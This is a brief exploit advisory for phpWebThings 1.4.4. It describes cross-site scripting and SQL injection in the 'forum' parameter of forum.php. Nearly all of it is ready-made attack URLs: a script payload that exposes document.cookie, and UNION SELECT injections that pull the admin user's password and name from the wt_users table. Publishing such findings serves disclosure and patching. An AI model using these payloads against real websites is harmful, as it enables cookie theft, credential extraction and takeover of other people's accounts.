XSS & SQL injection in phpWebThing
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org
The bug reside in : forum.php
Exploit :
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
Example :
XSS
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>
SQL
For Passowrd
http://xxx.com/forum.php?forum=-1 union select
password,password,null,null,null,null from wt_users where uid=1/*
For Name
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null
from wt_users where uid=1/*
Discovery by Linux_Drox
http://www.lezr.com
Best Regards